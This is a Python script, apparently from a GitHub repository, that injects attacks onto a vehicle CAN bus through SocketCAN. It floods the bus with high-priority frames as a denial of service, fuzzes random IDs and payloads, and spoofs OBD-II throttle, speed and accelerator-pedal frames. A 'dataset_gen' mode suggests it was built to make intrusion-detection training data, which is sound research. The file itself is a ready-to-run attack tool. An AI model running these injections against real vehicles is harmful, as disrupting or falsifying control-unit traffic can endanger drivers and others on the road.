-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathattack_gen.py
More file actions
116 lines (105 loc) · 4.57 KB
/
Copy pathattack_gen.py
File metadata and controls
116 lines (105 loc) · 4.57 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
import time
import can
import random
import sys
# Shared CAN bus handle, opened when the module is loaded and used by every
# function in this file: SocketCAN backend on channel "can0".
# NOTE(review): with SocketCAN the bit rate is normally configured on the
# network interface itself; confirm the ``bitrate`` argument has any effect.
bus = can.interface.Bus(
    interface="socketcan",
    channel="can0",
    bitrate=500000,
)
def send_message(arb_id=0x000, bytes=None):
    """Send a single CAN frame with a standard (non-extended) ID.

    The frame is sent on the module-level ``bus``.

    Args:
        arb_id: Arbitration ID of the frame.
        bytes: Payload as a sequence of byte values. Defaults to eight zero
            bytes. The parameter name shadows the builtin but is kept so
            that existing keyword callers continue to work.

    A ``can.CanError`` raised while sending is caught and reported on stdout;
    on success the ID, payload and channel are printed.
    """
    # Build the default payload per call instead of sharing one mutable list
    # object between all calls.
    payload = [0, 0, 0, 0, 0, 0, 0, 0] if bytes is None else bytes
    msg = can.Message(arbitration_id=arb_id, data=payload, is_extended_id=False)
    # The shared bus is intentionally not used as a context manager here:
    # leaving a ``with bus:`` block shuts the bus down, which would make every
    # later send on the module-level ``bus`` fail.
    try:
        bus.send(msg)
    except can.CanError:
        print("Message NOT sent")
    else:
        print(f"Message {hex(msg.arbitration_id)} {msg.data.hex()} sent on {bus.channel_info}")
def generate_random_bytes():
    """Return a list of eight random byte values, each in 0..255 inclusive."""
    # randrange() excludes its stop value, so the stop must be 256 for 0xFF
    # to be reachable.
    return [random.randrange(256) for _ in range(8)]
def dos_attack(interval=0.0002, duration=5, use_extended_id=False):
    """Send a stream of high-priority frames (arbitration ID 0x000, zero data).

    Runs ``int(duration / interval)`` cycles. Each cycle starts a cyclic send
    task on the module-level ``bus``, sleeps for ``interval`` seconds and
    stops the task again.

    Args:
        interval: Period in seconds handed to ``bus.send_periodic`` and slept
            between starting and stopping each task.
        duration: Nominal total run time in seconds; only used to derive the
            number of cycles.
        use_extended_id: Passed to ``can.Message`` as ``is_extended_id``.
    """
    print("Starting DoS Attack")
    # The frame never changes, so build it once instead of once per cycle.
    msg = can.Message(
        arbitration_id=0x000,
        data=[0, 0, 0, 0, 0, 0, 0, 0],
        is_extended_id=use_extended_id,
    )
    for _ in range(int(duration / interval)):
        task = bus.send_periodic(msg, interval)
        try:
            assert isinstance(task, can.CyclicSendTaskABC)
            time.sleep(interval)
        finally:
            # Stop the cyclic task even if the sleep is interrupted
            # (e.g. Ctrl-C), so it is not left transmitting.
            task.stop()
    print("Stopped DoS cyclic send")
def fuzzy_attack(interval=0.003, duration=5, use_extended_id=False):
    """Send a stream of frames with random arbitration IDs and payloads.

    Runs ``int(duration / interval)`` cycles. Each cycle builds a new random
    frame, starts a cyclic send task for it on the module-level ``bus``,
    sleeps for ``interval`` seconds and stops the task again.

    Args:
        interval: Period in seconds handed to ``bus.send_periodic`` and slept
            between starting and stopping each task.
        duration: Nominal total run time in seconds; only used to derive the
            number of cycles.
        use_extended_id: Passed to ``can.Message`` as ``is_extended_id``.
    """
    print("Starting Fuzzy Attack")
    for _ in range(int(duration / interval)):
        # NOTE(review): randrange() excludes its stop value, so IDs are drawn
        # from 0..4094; that range also exceeds 11 bits (0x7FF) when
        # use_extended_id is False. Confirm the intended ID range.
        msg = can.Message(
            arbitration_id=random.randrange(0, 4095),
            data=generate_random_bytes(),
            is_extended_id=use_extended_id,
        )
        task = bus.send_periodic(msg, interval)
        try:
            assert isinstance(task, can.CyclicSendTaskABC)
            time.sleep(interval)
        finally:
            # Stop the cyclic task even if the sleep is interrupted
            # (e.g. Ctrl-C), so it is not left transmitting.
            task.stop()
    print("Stopped Fuzzy attack")
def throt_spoofing(interval=0.01, duration=5, use_extended_id=False):
    """Send a stream of falsified throttle frames (arbitration ID 0x7E2).

    Runs ``int(duration / interval)`` cycles. Each cycle starts a cyclic send
    task on the module-level ``bus``, sleeps for ``interval`` seconds and
    stops the task again.

    Args:
        interval: Period in seconds handed to ``bus.send_periodic`` and slept
            between starting and stopping each task.
        duration: Nominal total run time in seconds; only used to derive the
            number of cycles.
        use_extended_id: Passed to ``can.Message`` as ``is_extended_id``.
    """
    print("Starting Throttle Spoofing")
    # The frame never changes, so build it once instead of once per cycle.
    # Payload bytes 1 and 2 are 0x41 (65) and 0x11 (17).
    # NOTE(review): presumably an OBD-II mode-01 response for the throttle
    # position PID; verify against the target ECU.
    msg = can.Message(
        arbitration_id=0x7E2,
        data=[0x00, 0x41, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00],
        is_extended_id=use_extended_id,
    )
    for _ in range(int(duration / interval)):
        task = bus.send_periodic(msg, interval)
        try:
            assert isinstance(task, can.CyclicSendTaskABC)
            time.sleep(interval)
        finally:
            # Stop the cyclic task even if the sleep is interrupted
            # (e.g. Ctrl-C), so it is not left transmitting.
            task.stop()
    print("Stopped Throttle Spoofing")
def speed_spoofing(interval=0.01, duration=5, use_extended_id=False):
    """Send a stream of falsified vehicle-speed frames (arbitration ID 0x7E2).

    Runs ``int(duration / interval)`` cycles. Each cycle starts a cyclic send
    task on the module-level ``bus``, sleeps for ``interval`` seconds and
    stops the task again.

    Args:
        interval: Period in seconds handed to ``bus.send_periodic`` and slept
            between starting and stopping each task.
        duration: Nominal total run time in seconds; only used to derive the
            number of cycles.
        use_extended_id: Passed to ``can.Message`` as ``is_extended_id``.
    """
    print("Starting Vehicle Speed Spoofing")
    # The frame never changes, so build it once instead of once per cycle.
    # Payload bytes 1 and 2 are 0x41 (65) and 0x0D (13).
    # NOTE(review): presumably an OBD-II mode-01 response for the vehicle
    # speed PID; verify against the target ECU.
    msg = can.Message(
        arbitration_id=0x7E2,
        data=[0x00, 0x41, 0x0D, 0x00, 0x00, 0x00, 0x00, 0x00],
        is_extended_id=use_extended_id,
    )
    for _ in range(int(duration / interval)):
        task = bus.send_periodic(msg, interval)
        try:
            assert isinstance(task, can.CyclicSendTaskABC)
            time.sleep(interval)
        finally:
            # Stop the cyclic task even if the sleep is interrupted
            # (e.g. Ctrl-C), so it is not left transmitting.
            task.stop()
    print("Stopped Vehicle Speed Spoofing")
def acelleration_spoofing(interval=0.01, duration=5, use_extended_id=False):
    """Send a stream of falsified acceleration response frames (ID 0x7E0).

    Runs ``int(duration / interval)`` cycles. Each cycle starts a cyclic send
    task on the module-level ``bus``, sleeps for ``interval`` seconds and
    stops the task again. The misspelled function name is kept because
    callers refer to it.

    Args:
        interval: Period in seconds handed to ``bus.send_periodic`` and slept
            between starting and stopping each task.
        duration: Nominal total run time in seconds; only used to derive the
            number of cycles.
        use_extended_id: Passed to ``can.Message`` as ``is_extended_id``.
    """
    print("Starting Acceleration Spoofing")
    # The frame never changes, so build it once instead of once per cycle.
    # Payload bytes 1 and 2 are 0x41 (65) and 0x49 (73).
    # NOTE(review): presumably an OBD-II mode-01 response for an accelerator
    # pedal position PID; verify against the target ECU.
    msg = can.Message(
        arbitration_id=0x7E0,
        data=[0x00, 0x41, 0x49, 0x00, 0x00, 0x00, 0x00, 0x00],
        is_extended_id=use_extended_id,
    )
    for _ in range(int(duration / interval)):
        task = bus.send_periodic(msg, interval)
        try:
            assert isinstance(task, can.CyclicSendTaskABC)
            time.sleep(interval)
        finally:
            # Stop the cyclic task even if the sleep is interrupted
            # (e.g. Ctrl-C), so it is not left transmitting.
            task.stop()
    print("Stopped Acceleration Spoofing")
if __name__ == "__main__":
    # Command-line entry point.
    #
    #   <script> serial_attack [dataset_gen]
    #       Run every attack once, in the order listed below, with default
    #       timing. "dataset_gen" switches the frames to extended IDs.
    #   <script> {dos|fuzzy|throt|speed|accel} [duration [interval]]
    #       Run one attack. duration is parsed as int seconds, interval as
    #       float seconds; anything omitted falls back to that attack's own
    #       default.
    #
    # Insertion order of this table is the execution order of serial_attack.
    single_attacks = {
        "dos": dos_attack,
        "fuzzy": fuzzy_attack,
        "throt": throt_spoofing,
        "speed": speed_spoofing,
        "accel": acelleration_spoofing,
    }
    usage = (
        f"usage: {sys.argv[0]} serial_attack [dataset_gen]\n"
        f"       {sys.argv[0]} {{{'|'.join(single_attacks)}}} [duration [interval]]"
    )

    try:
        # A missing command used to die with a bare IndexError.
        if len(sys.argv) < 2:
            sys.exit(usage)
        command = sys.argv[1]

        if command == "serial_attack":
            use_extended_id = len(sys.argv) > 2 and sys.argv[2] == "dataset_gen"
            for attack in single_attacks.values():
                attack(use_extended_id=use_extended_id)
        elif command in single_attacks:
            # Pass only what was supplied so each attack keeps its own
            # defaults. A lone duration argument is honoured rather than
            # silently ignored.
            overrides = {}
            if len(sys.argv) > 2:
                overrides["duration"] = int(sys.argv[2])
            if len(sys.argv) > 3:
                overrides["interval"] = float(sys.argv[3])
            single_attacks[command](**overrides)
        else:
            # An unknown command used to be a silent no-op.
            sys.exit(f"unknown command {command!r}\n{usage}")
    finally:
        # Release the bus on every exit path, including errors and Ctrl-C.
        bus.shutdown()